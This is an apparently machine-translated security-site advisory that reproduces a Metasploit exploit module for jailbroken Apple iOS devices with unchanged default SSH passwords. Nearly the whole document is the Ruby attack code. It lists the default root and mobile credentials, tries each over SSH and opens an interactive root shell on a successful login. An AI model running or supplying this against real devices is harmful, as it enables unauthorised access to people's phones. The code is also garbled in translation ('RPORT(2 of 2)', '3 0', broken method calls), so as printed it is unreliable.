Apple IOS default SSH password Exploit-vulnerability warning-the black bar safety net

2012-10-13T00:00:00
ID MYHACK58:62201235155
Type myhack58
Reporter 佚名
Modified 2012-10-13T00:00:00

Description

When the Apple iOS jailbreak and root and mobile users use the default password, you can use the following Metasploit to Exploit the use of the test.

This file is part of the Metasploit Framework and may be subject to

redistribution and commercial restrictions. Please see the Metasploit

Framework web site for more information on licensing and terms of use.

http://metasploit.com/framework/

require 'msf/core' require 'net/ssh'

class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Auxiliary::CommandShell def initialize(info={}) super(update_info(info, 'Name' => "Apple iOS Default SSH Password Vulnerability", 'Description' => %q{ This the module exploits the default credentials of Apple iOS when it has been jailbroken and the passwords for the 'root' and 'mobile' users have not been changed. }, 'License' => MSF_LICENSE, 'Author' => [ 'hdm' ], 'References' => [ ], 'DefaultOptions' => { 'ExitFunction' => "none" }, 'Payload' => { 'Compat' => { 'PayloadType' => 'cmd_interact', 'The ConnectionType' => 'find' } }, 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Targets' => [ ['Apple iOS', { 'accounts' => [ [ 'root', 'alpine' ], [ 'mobile', 'dottie' ]] } ], ], 'Privileged' => true, 'DefaultTarget' => 0)) register_options( [ Opt::RHOST(), Opt::RPORT(2 of 2) ], self. class ) register_advanced_options( [ OptBool. new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]), OptInt. new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 3 0]) ] ) end def rhost datastore['RHOST'] end def rport datastore['RPORT'] end def do_login(user, pass) opts = { :auth_methods => ['password', 'keyboard-interactive'], :msframework => framework, :msfmodule => self, :port => rport, :disable_agent => true, :config => false, :password => pass, :record_auth_info => true, :proxies => datastore['Proxies'] } opts. merge! (:verbose => :debug) if datastore['SSH_DEBUG'] begin ssh = nil ::Timeout. timeout(datastore['SSH_TIMEOUT']) do ssh = Net::SSH. start(rhost, user, opts) end rescue Rex::ConnectionError, Rex::AddressInUse return rescue Net::SSH::Disconnect, ::EOFError print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation" return rescue ::Timeout::Error print_error "#{rhost}:#{rport} SSH - Timed out during negotiation" return rescue Net::SSH::AuthenticationFailed print_error "#{rhost}:#{rport} SSH - Failed authentication" rescue Net::SSH::Exception => e print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e. message}" return end if ssh conn = Net::SSH::CommandStream. new(ssh, '/bin/sh', true) ssh = nil return conn end return nil end def exploit self. target['accounts']. each do |info| user,pass = info print_status("#{rhost}:#{rport} - Attempt to login as '#{user}' with password '#{pass}'") conn = do_login(user, pass) if conn print_good("#{rhost}:#{rport} - Login Successful with '#{user}:#{pass}'") handler(conn. lsock) break end end end end